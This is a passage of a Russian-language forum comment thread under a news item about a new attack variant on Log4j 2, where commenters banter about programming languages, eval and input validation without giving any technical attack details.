Сообщение от Аноним (87), 15-Дек-21, 21:44 
Более того добавлю. В С++ все эти проблемы которые вы тут вешаете на С были решены настолько давно, что про раст никто даже не думал. Так что забейте. Читайте книжки по C++ и будьте счастливы, удивитесь тому что всех этих проблем в C++ давным давно нет.
Ответить | Правка | Наверх | Cообщить модератору

116. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от _ (??), 16-Дек-21, 19:41 
Ну да - если плюсы не юзать - плюсопроблем и нет ... Л-логика :)
Для дюбого Ёзыга подходит. А они все - ***но, потому как нет нет большой красной кноки "Сделать ЗБС!" ни в одном :(
:-D
Ответить | Правка | Наверх | Cообщить модератору

83. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от gogo (?), 15-Дек-21, 15:46 
Этого не может быть.
Это заговор, как китайский короновирус.
Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

103. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от ms is piece of s (?), 15-Дек-21, 20:50 
А ведь люди сперва распарсевают смысл написанного, а всё равно задают глупые вопросы как такое может быть?
Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

109. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (109), 16-Дек-21, 06:39 
> люди сперва распарсевают смысл написанного

Да ладно тебе. Ну кто таким заниматься будет?

Ответить | Правка | Наверх | Cообщить модератору

98. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +7 +/
Сообщение от Онаним (?), 15-Дек-21, 20:23 
Ну всё, сейчас будут вместо того, чтобы eval убрать, городить кучу валидаций, и в итоге эти валидации всё равно будут обходить.
Ответить | Правка | Наверх | Cообщить модератору

120. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (82), 18-Дек-21, 02:56 
В любой валидации будет дыра, ведь код пишут прогосеки с растаманоподобными мозгами.
Ответить | Правка | Наверх | Cообщить модератору

121. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Онаним (?), 18-Дек-21, 19:00 
Это называется "за смузи проeval'и зияющую дырину".
Ответить | Правка | Наверх | Cообщить модератору

107. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +3 +/
Сообщение от anonymous (??), 15-Дек-21, 22:48 
А ведь это даже не сишечка с переполнением буфера. А вполне кошерный менеджмент памяти со сборкой мусора. Может дело не в них?
Ответить | Правка | Наверх | Cообщить модератору

111. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +1 +/
Сообщение от Онаним (?), 16-Дек-21, 09:12 
Да как обычно, дело не в бобине...
Ответить | Правка | Наверх | Cообщить модератору

115. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от _ (??), 16-Дек-21, 19:39 
сейчас где то умер котё^W ржавчик. Как же так то?! ржавчина "нэ спасэ?!" ... какая боль ... ;-D
Ответить | Правка | Наверх | Cообщить модератору

119. "Новый вариант атаки на Log4j 2, позволяющий обойти добавленн..."  +/
Сообщение от Аноним (82), 18-Дек-21, 02:54 
Не только не спасает, а даже облегчает написание троянов.
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру